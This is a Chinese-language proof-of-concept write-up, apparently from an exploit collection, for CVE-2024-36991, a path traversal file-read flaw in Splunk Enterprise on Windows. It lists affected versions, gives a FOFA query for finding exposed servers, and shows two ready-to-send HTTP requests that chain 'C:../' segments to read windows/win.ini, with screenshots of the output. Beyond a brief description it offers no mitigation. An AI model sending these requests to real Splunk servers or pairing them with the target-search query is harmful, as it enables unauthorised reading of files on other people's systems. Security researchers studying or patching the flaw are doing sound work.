POC/wpoc/SplunkEnterprise/SplunkEnterprise任意文件读取漏洞(CVE-2024-36991).md

# Splunk Enterprise任意文件读取漏洞(CVE-2024-36991)

# 一、漏洞简介
Splunk是美国Splunk公司的一套数据收集分析软件。该软件主要用于收集、索引和分析及其所产生的数据，包括所有IT系统和基础结构（物理、虚拟机和云）生成的数据。Splunk存在安全漏洞。攻击者利用该漏洞可以访问存储在web根文件夹之外的文件和目录。

# 二、影响版本
+ 9.2<=Splunk Enterprise<9.2.2
+ 9.1<=Splunk Enterprise<9.1.5
+ 9.0<=Splunk Enterprise<9.0.10

# 三、资产测绘
+ fofa`app="splunk-Enterprise"`
+ 特征

![1720273720505-3af79a8c-bd30-41f5-b5fb-44ae246c02f3.png](./img/MgsperMvGBWWALbV/1720273720505-3af79a8c-bd30-41f5-b5fb-44ae246c02f3-225104.png)

# 四、漏洞复现
```http
GET /en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../windows/win.ini HTTP/1.1
Host: 
Accept-Encoding:gzip,deflate,br
Accept:*/*
Accept-Language:en-US;q=0.9,en;q=0.8
User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/124.0.6367.118Safari/537.36
Connection:close
Cache-Control:max-age=0
```

![1720273759529-a759e825-7b31-4472-9ef7-19625d1b6ab5.png](./img/MgsperMvGBWWALbV/1720273759529-a759e825-7b31-4472-9ef7-19625d1b6ab5-430061.png)

```http
GET /zh-CN/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../windows/win.ini HTTP/1.1
Host: 
Accept-Encoding:gzip,deflate,br
Accept:*/*
Accept-Language:en-US;q=0.9,en;q=0.8
User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/124.0.6367.118Safari/537.36
Connection:close
Cache-Control:max-age=0
```

![1720273792757-5a47a5df-5caf-4007-a33b-0248ab13a19d.png](./img/MgsperMvGBWWALbV/1720273792757-5a47a5df-5caf-4007-a33b-0248ab13a19d-711831.png)



> 更新: 2024-09-05 23:24:41  
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ovx0hur1ngmfy7f9>